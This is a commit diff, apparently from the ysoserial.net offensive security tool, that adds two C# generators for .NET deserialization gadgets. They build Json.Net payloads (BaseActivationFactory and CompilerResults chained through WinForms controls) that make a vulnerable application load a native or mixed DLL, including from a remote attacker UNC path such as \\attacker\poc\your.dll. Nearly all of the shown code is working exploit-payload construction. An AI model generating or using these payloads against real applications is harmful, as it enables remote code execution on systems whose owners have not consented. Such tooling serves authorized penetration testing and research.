pwntester
diff --git a/‎README.md
Lines changed: 512 additions & 413 deletions b/‎README.md
Lines changed: 512 additions & 413 deletions
diff --git a/‎ysoserial/Generators/BaseActivationFactoryGenerator.cs
Lines changed: 111 additions & 0 deletions b/‎ysoserial/Generators/BaseActivationFactoryGenerator.cs
Lines changed: 111 additions & 0 deletions
diff --git a/‎ysoserial/Generators/GetterCompilerResultsGenerator.cs
Lines changed: 170 additions & 0 deletions b/‎ysoserial/Generators/GetterCompilerResultsGenerator.cs
Lines changed: 170 additions & 0 deletions
@@ -0,0 +1,111 @@
+using NDesk.Options;
+using System;
+using System.Collections.Generic;
+using System.Collections.Specialized;
+using System.Diagnostics;
+using System.Linq;
+using System.Reflection;
+using System.Text;
+using System.Threading.Tasks;
+using System.Windows.Data;
+using ysoserial.Helpers;
+
+namespace ysoserial.Generators
+{
+    public class BaseActivationFactoryGenerator : GenericGenerator
+    {
+        // BaseActivationFactory
+        // Gadget for .NET 5/6/7 with WPF enabled or Microsoft.WindowsDesktop.App\PresentationFramework.dll available
+        // BaseActivationFactory constructor leads to kernel32!LoadLibraryExW call, one can load remote native DLL (C/C++)
+        // As an input (-c), you have to provide a path to the DLL (UNC path can be given). ATTENTION - ".dll" string will be appended to your path, you shouldn't provide it
+
+        public override List<string> SupportedFormatters()
+        {
+            return new List<string> { "Json.Net" }; // MessagePack should work too
+        }
+
+        public override string Name()
+        {
+            return "BaseActivationFactory";
+        }
+
+        public override string Finders()
+        {
+            return "Piotr Bazydlo";
+        }
+
+        public override string AdditionalInfo()
+        {
+            return "Gadget for .NET 5/6/7 with WPF enabled or Microsoft.WindowsDesktop.App\\PresentationFramework.dll available. Leads to remote DLL loading (native C/C++ DLL)";
+        }
+
+        public override List<string> Labels()
+        {
+            return new List<string> { GadgetTypes.NotBridgeNotDerived, ".NET 5/6/7", "Requires WPF enabled or PresentationFramework.dll" };
+        }
+
+        public override string SupportedBridgedFormatter()
+        {
+            return Formatters.BinaryFormatter;
+        }
+
+        public override object Generate(string formatter, InputArgs inputArgs)
+        {
+
+            String payload;
+            String targetPath = "";
+            inputArgs.IsRawCmd = true;
+
+            if (!inputArgs.CmdFullString.ToLowerInvariant().EndsWith(".dll"))
+            {
+                Console.WriteLine("This gadget loads remote/local file: -c argument should provide a file path to your DLL file\r\nUNC paths can be used for the remote DLL loading, like \\\\attacker\\poc\\your.dll\r\nThis gadget can only load files with DLL extension, as .dll extension will be added to the path during the deserialization\r\nExample: ysoserial.exe -g BaseActivationFactory -f Json.Net -c '\\\\attacker\\poc\\your.dll'");
+                Environment.Exit(-1);
+            }
+
+            if (formatter.ToLower().Equals("json.net"))
+            {
+                inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
+
+                //remove .dll from the targetPath - it will be added by the code during the deserialization
+                targetPath = inputArgs.CmdFullString;
+                targetPath = targetPath.Substring(0, targetPath.Length - 4);
+
+                payload = @"{
+    '$type':'WinRT.BaseActivationFactory, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
+    'typeNamespace':'" + targetPath + @"',
+    'typeFullName':'whatever'
+}
+";
+
+                if (inputArgs.Minify)
+                {
+                    if (inputArgs.UseSimpleType)
+                    {
+                        payload = JsonHelper.Minify(payload, new string[] { "mscorlib" }, null);
+                    }
+                    else
+                    {
+                        payload = JsonHelper.Minify(payload, null, null);
+                    }
+                }
+
+                if (inputArgs.Test)
+                {
+                    try
+                    {
+                        Console.WriteLine("Test not implemented for .NET 5/6/7 gadget. Please test manually on those versions with WPF enabled.");
+                    }
+                    catch (Exception err)
+                    {
+                        Debugging.ShowErrors(inputArgs, err);
+                    }
+                }
+                return payload;
+            }
+            else
+            {
+                throw new Exception("Formatter not supported");
+            }
+        }
+    }
+}
@@ -0,0 +1,170 @@
+using NDesk.Options;
+using Newtonsoft.Json.Linq;
+using System;
+using System.Collections.Generic;
+using System.Runtime.Serialization;
+using System.Security.Principal;
+using System.Windows.Markup;
+using ysoserial.Helpers;
+
+namespace ysoserial.Generators
+{
+    public class GetterCompilerResultsGenerator : GenericGenerator
+    {
+        // CompilerResults + Getter call gadget
+        // CompilerResults.get_CompiledAssembly leads to the DLL Load: remote DLL loading for .NET 5/6/7 and local DLL loading for .NET Framework
+        // .NET 5/6/7 requires WPF enabled, as getter-call gadgets exist in WPF assemblies
+        // Mixed DLLs can be loaded
+
+        // We can deserialize the CompilerResults with proper member values
+        // and then call the get_CompiledAssembly with one of the getter-call gadgets:
+        // PropertyGrid
+        // ComboBox
+        // ListBox
+        // CheckedListBox
+
+        // It should be possible to use it with the serializers that are able to call the one-arg constructor
+
+        private int variant_number = 1; // Default
+
+        public override List<string> SupportedFormatters()
+        {
+            return new List<string> { "Json.Net"}; // MessagePack should work too
+        }
+
+        public override string Name()
+        {
+            return "GetterCompilerResults";
+        }
+
+        public override string Finders()
+        {
+            return "Piotr Bazydlo";
+        }
+
+        public override string AdditionalInfo()
+        {
+            return "Remote DLL loading gadget for .NET 5/6/7 with WPF enabled (mixed DLL). Local DLL loading for .NET Framework if System.CodeDom is available. DLL path delivered with -c argument";
+        }
+
+        public override OptionSet Options()
+        {
+            OptionSet options = new OptionSet()
+            {
+                {"var|variant=", "Variant number. Variant defines a different getter-call gadget. Choices: \r\n1 (default) - PropertyGrid getter-call gadget, " +
+                "\r\n2 - ComboBox getter-call gadget (may load DLL twice)" +
+                "\r\n3 - ListBox getter-call gadget" +
+                "\r\n4 - CheckedListBox getter-call gadget", v => int.TryParse(v, out variant_number) },
+            };
+
+            return options;
+        }
+
+        public override List<string> Labels()
+        {
+            return new List<string> { GadgetTypes.GetterChainNotDerived, "Remote DLL loading for .NET 5/6/7 with WPF Enabled, Local DLL loading for .NET Framework if System.CodeDom is available" };
+        }
+
+        public override string SupportedBridgedFormatter()
+        {
+            return Formatters.BinaryFormatter;
+        }
+
+        public override object Generate(string formatter, InputArgs inputArgs)
+        {
+            String payload;
+            String compilerPayload;
+            inputArgs.IsRawCmd = true;
+
+            if (!inputArgs.CmdFullString.ToLowerInvariant().EndsWith(".dll"))
+            {
+                Console.WriteLine("This gadget loads remote (.NET 5/6/7) or local file (.NET Framework, if System.CodeDom is available): -c argument should provide a file path to your mixed DLL file, which needs to end with the \".dll\"\r\nUNC paths can be used for the remote DLL loading, like \\\\attacker\\poc\\your.dll\r\nIf you want to deliver file with a different extension than .dll, please modify the gadget manually\r\nExample: ysoserial.exe -g GetterCompilerResults -f Json.Net -c '\\\\attacker\\poc\\your.dll'");
+                Environment.Exit(-1);
+            }
+
+            if (formatter.ToLower().Equals("json.net"))
+            {
+                inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
+
+                compilerPayload = @"{
+            '$type':'System.CodeDom.Compiler.CompilerResults, System.CodeDom, Version=5.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51',
+            'tempFiles':null,
+            'PathToAssembly':'" + inputArgs.CmdFullString + @"'
+        }";
+
+                if (variant_number == 2)
+                {
+                    payload = @"{
+    '$type':'System.Windows.Forms.ComboBox, System.Windows.Forms, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
+    'Items':[
+        " + compilerPayload + @"
+    ], 
+    'DisplayMember':'CompiledAssembly',
+    'Text':'whatever'
+}";
+                }
+                else if (variant_number == 3)
+                {
+                    payload = @"{
+    '$type':'System.Windows.Forms.ListBox, System.Windows.Forms, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
+    'Items':[
+        " + compilerPayload + @"
+    ], 
+    'DisplayMember':'CompiledAssembly',
+    'Text':'whatever'
+}";
+                }
+                else if (variant_number == 4)
+                {
+                    payload = @"{
+    '$type':'System.Windows.Forms.CheckedListBox, System.Windows.Forms, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
+    'Items':[
+        " + compilerPayload + @"
+    ], 
+    'DisplayMember':'CompiledAssembly',
+    'Text':'whatever'
+}";
+                }
+                else
+                {
+                    payload = @"{
+    '$type':'System.Windows.Forms.PropertyGrid, System.Windows.Forms, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
+    'SelectedObjects':[
+        " + compilerPayload + @"
+    ]
+}";
+                }
+
+                if (inputArgs.Minify)
+                {
+                    if (inputArgs.UseSimpleType)
+                    {
+                        payload = JsonHelper.Minify(payload, new string[] { "mscorlib" }, null);
+                    }
+                    else
+                    {
+                        payload = JsonHelper.Minify(payload, null, null);
+                    }
+                }
+
+                if (inputArgs.Test)
+                {
+                    try
+                    {
+                        SerializersHelper.JsonNet_deserialize(payload);
+                    }
+                    catch (Exception err)
+                    {
+                        Debugging.ShowErrors(inputArgs, err);
+                    }
+                }
+                return payload;
+            }
+            else
+            {
+                throw new Exception("Formatter not supported");
+            }
+        }
+    }
+
+}